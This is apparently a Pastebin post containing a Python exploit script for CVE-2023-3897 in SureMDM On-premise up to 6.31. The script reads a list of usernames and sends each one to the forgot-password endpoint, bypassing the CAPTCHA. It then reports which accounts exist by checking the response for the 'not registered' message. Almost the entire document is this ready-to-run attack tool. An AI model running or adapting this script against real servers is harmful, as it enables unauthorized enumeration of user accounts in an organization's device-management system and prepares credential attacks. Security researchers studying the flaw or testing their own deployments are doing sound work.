Advertisement
FlyFar

SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration - CVE-2023-3897

Feb 22nd, 2024
968
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.70 KB | Cybersecurity | 0 0
  1. # Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
  2. # Date: 05/12/2023
  3. # Exploit Author: Jonas Benjamin Friedli
  4. # Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
  5. # Version: <= 6.31
  6. # Tested on: 6.31
  7. # CVE : CVE-2023-3897
  8.  
  9. import requests
  10. import sys
  11.  
  12. def print_help():
  13.     print("Usage: python script.py [URL] [UserListFile]")
  14.     sys.exit(1)
  15.  
  16.  
  17. def main():
  18.     if len(sys.argv) != 3 or sys.argv[1] == '-h':
  19.         print_help()
  20.  
  21.     url, user_list_file = sys.argv[1], sys.argv[2]
  22.  
  23.     try:
  24.         with open(user_list_file, 'r') as file:
  25.             users = file.read().splitlines()
  26.     except FileNotFoundError:
  27.         print(f"User list file '{user_list_file}' not found.")
  28.         sys.exit(1)
  29.  
  30.     valid_users = []
  31.     bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
  32.     enumerate_txt = "This User ID/Email ID is not registered."
  33.     for index, user in enumerate(users):
  34.         progress = (index + 1) / len(users) * 100
  35.         print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")
  36.  
  37.         data = {"UserId": user}
  38.         response = requests.post(
  39.             f"{url}{bypass_dir}",
  40.             json=data,
  41.             headers={"Content-Type": "application/json; charset=utf-8"}
  42.         )
  43.  
  44.         if response.status_code == 200:
  45.             response_data = response.json()
  46.             if enumerate_txt not in response_data.get('d', {}).get('message', ''):
  47.                 valid_users.append(user)
  48.  
  49.     print("\nFinished processing users.")
  50.     print(f"Valid Users Found: {len(valid_users)}")
  51.     for user in valid_users:
  52.         print(user)
  53.  
  54. if __name__ == "__main__":
  55.     main()
  56.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement